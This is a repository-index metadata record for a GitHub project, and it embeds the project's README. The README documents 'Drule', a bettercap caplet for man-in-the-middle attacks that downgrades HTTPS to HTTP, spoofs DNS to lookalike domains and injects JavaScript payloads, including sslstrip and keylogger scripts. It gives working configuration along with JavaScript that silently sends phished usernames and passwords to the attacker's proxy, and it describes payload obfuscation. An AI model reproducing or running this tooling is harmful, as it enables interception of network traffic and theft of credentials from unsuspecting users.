{"id":21819020,"url":"https://github.com/vernonthedev/drule-https-downgrader","last_synced_at":"2026-04-28T13:32:40.887Z","repository":{"id":202934271,"uuid":"708381220","full_name":"vernonthedev/drule-https-downgrader","owner":"vernonthedev","description":"HTTPS to HTTP downgrader caplet for bettercap, injects javascript and replaces targeted hostnames with spoofed ones","archived":false,"fork":false,"pushed_at":"2025-06-20T15:19:11.000Z","size":21,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-07-02T12:49:46.889Z","etag":null,"topics":["bettercap","caplet","hacking-tool","javascript"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vernonthedev.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-10-22T11:56:59.000Z","updated_at":"2025-06-20T15:19:15.000Z","dependencies_parsed_at":null,"dependency_job_id":"bfd1f8c6-b9fa-46cc-9f0e-373006fd2194","html_url":"https://github.com/vernonthedev/drule-https-downgrader","commit_stats":null,"previous_names":["vernonthedev/drule-https-downgrader"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/vernonthedev/drule-https-downgrader","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vernonthedev%2Fdrule-https-downgrader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vernonthedev%2Fdrule-https-downgrader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vernonthedev%2Fdrule-https-downgrader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vernonthedev%2Fdrule-https-downgrader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vernonthedev","download_url":"https://codeload.github.com/vernonthedev/drule-https-downgrader/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vernonthedev%2Fdrule-https-downgrader/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32383056,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-28T11:25:28.583Z","status":"ssl_error","status_checked_at":"2026-04-28T11:25:05.435Z","response_time":56,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bettercap","caplet","hacking-tool","javascript"],"created_at":"2024-11-27T16:16:23.092Z","updated_at":"2026-04-28T13:32:40.873Z","avatar_url":"https://github.com/vernonthedev.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv id=\"badges\" align=\"center\"\u003e\n  \u003ca href=\"https://www.linkedin.com/in/vernonthedev/\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/LinkedIn-blue?style=for-the-badge\u0026logo=linkedin\u0026logoColor=white\" alt=\"LinkedIn Badge\"/\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://www.youtube.com/channel/UCjNin5VUso1QXPSS7YFsIDQ\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/YouTube-red?style=for-the-badge\u0026logo=youtube\u0026logoColor=white\" alt=\"Youtube Badge\"/\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://twitter.com/vernonthedev\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Twitter-blue?style=for-the-badge\u0026logo=twitter\u0026logoColor=white\" alt=\"Twitter Badge\"/\u003e\n  \u003c/a\u003e\u003cbr\u003e\n  \u003cimg src=\"https://komarev.com/ghpvc/?username=vernonthedev\u0026style=flat-square\u0026color=blue\" alt=\"\"/\u003e\n\u003c/div\u003e\n\n# Drule bettercap Caplet(HTTPS downgrader)\n### Caplet\n\n```sh\nset drule.log             /usr/local/share/bettercap/caplets/drule/ssl.log\nset drule.ignore          *\nset drule.targets         *.com, *.co.uk\nset drule.replacements    *.corn,*.cc.uk\n#set drule.blockscripts    facebook.com,*.facebook.com\nset drule.obfuscate       false\nset drule.encode          true\nset drule.payloads        *:/usr/local/share/bettercap/caplets/drule/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/drule/payloads/keylogger.js\n\nset http.proxy.script  /usr/local/share/bettercap/caplets/drule/drule.js\nset dns.spoof.domains  *.corn,*.cc.uk\n\nhttp.proxy  on\ndns.spoof   on\n```\n\n### Core payload\n\nThis module injects HTML \u0026 JS files with a payload that replaces targeted hostnames with spoofed ones, and communicates with bettercap, revealing all URLs that were discovered in the injected document.\n\nWhen bettercap receives a callback with a new URL, it sends a HEAD request to learn whether the host in this URL sends HTTPS redirects, and keeps a log.\n\nThis is done so that bettercap can know whether it should MITM an SSL connection with a host, before the victim navigates to it.\n\n### Custom payloads\n\nYou can also inject your own JavaScript payloads into HTML \u0026 JS files from specific hosts by assigning them to the `drule.payloads` variable.\n\nExample:\n\n```sh\ndrule.payloads *:drule/payloads/sslstrip.js,google.com:drule/payloads/google.js,*.google.com:drule/payloads/google.js\n```\n\nOnce the payload is injected into a page, you can technically phish any data unless the client navigates to a URL that either has strict transport security rules enforced by their browser, or the URL was not stripped due to JavaScript security.\n\n\u003ca href=\"./payloads/sslstrip.js\"\u003e**sslstrip.js**\u003c/a\u003e is included, which strips the `s` from all `https` instances in `\u003ca\u003e`, `\u003cform\u003e` and `\u003ciframe\u003e` elements.\n\n### Obfuscation\n\nBy setting `drule.obfuscate` to `true`, any instance in your payloads beginning with `obf_` will be obfuscated automatically.\n\nExample: \n\n```js\nfunction obf_function() {\n  alert(\"Random variable: obf_whatever_follows\")\n}\n\nobf_function()\n```\n\nWill be injected as:\n\n```js\nfunction jfIleNwmKoa() {\n  alert(\"Random variable: AsjZnJW\")\n}\n\njfIleNwmKoa()\n```\n\n### Encoding\n\nPayloads can be injected in HTML documents using base64 encoded data URLs.\n\nTo enable payload encoding, set `drule.encode` to `true`.\n\n### Silent callbacks\n\nYou can write custom payloads that send data to bettercap without alerting the host.\n\nExample of a silent callback:\n\n```js\nform.onsubmit = function() {\n  req = new XMLHttpRequest()\n  req.open(\"POST\", \"http://\" + location.host + \"/obf_path_callback?username=\" + username + \"\u0026password=\" + password)\n  req.send()\n}\n```\n\u003csup\u003eNote: Every instance of `obf_path_callback` will be replaced with the callback path, every instance of `obf_path_whitelist` will be replaced with the whitelist path, and every instance of `obf_path_ssl_log` will be replaced with the SSL log path.\u003c/sup\u003e\n\nThe code above will send a POST request that will be sniffed by bettercap, but not proxied. \n\n### Whitelisting callbacks\n\nYou can stop attacking a client on a certain host when you receive a request from that client for the whitelist path. The whitelist path will be inserted wherever you have `obf_path_whitelist` written in your payloads (`/` will not be written).\n\nExample of whitelisting callbacks:\n\n```js\n// Whitelist multiple domains\n\nform.onsubmit = function() {\n  // Whitelist current hostname and phish credentials\n  req = new XMLHttpRequest()\n  req.open(\"POST\", \"http://\" + location.hostname + \"/obf_path_whitelist?username=\" + username + \"\u0026password=\" + password)\n  req.send()\n\n  // Whitelist facebook\n  req = new XMLHttpRequest()\n  req.open(\"POST\", \"http://facedook.com/obf_path_whitelist\")\n  req.send()\n\n  // Whitelist facebook CDN\n  req = new XMLHttpRequest()\n  req.open(\"POST\", \"http://static.xx.fdcdn.net/obf_path_whitelist\")\n  req.send()\n\n  // Whitelist redirect to facebook\n  req = new XMLHttpRequest()\n  req.open(\"POST\", \"http://fd.com/obf_path_whitelist\")\n  req.send()\n}\n```\n\nWhen the bettercap proxy receives such a request, it will stop attacking clients on the requested (original and spoofed) host(s). If a spoofed location is requested that was whitelisted, the client will then be redirected to the intended location.\n\nNote that if the hostnames you are whitelisting are HSTS preloaded, you have to send the whitelist callback to the spoofed hostnames, otherwise the browser will enforce a HTTPS connection, and bettercap will not be able to intercept the requests.\n\n### Block scripts\n\nIn the \u003ca href=\"./drule.cap\"\u003e**caplet file**\u003c/a\u003e you can block JavaScript on hosts by assigning them to the `drule.blockscripts` variable. _(wildcard allowed)_ \n\n### SSL log\n\nIf a host responds with a HTTPS redirect, the module saves this host in the SSL log, and bettercap will from then on spoof SSL connections for this host when possible.\n\n### Hostname spoofing\n\nIn the \u003ca href=\"./drule.cap\"\u003e**caplet file**\u003c/a\u003e you can assign comma separated domains to the `drule.targets` variable. _(wildcard allowed)_\n\nFor every hostname you assign to `drule.targets` you must assign a replacement domain to the `drule.replacements` variable.\n\nExample:\n\n```sh\nset drule.targets       *.com, blockchain.info,*.blockchain.info\nset drule.replacements  *.corn,blockchian.info,*.blockchian.info\n```\n\nYou can try to make them as unnoticeable or obvious as you like, but your options are limited here.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvernonthedev%2Fdrule-https-downgrader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvernonthedev%2Fdrule-https-downgrader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvernonthedev%2Fdrule-https-downgrader/lists"}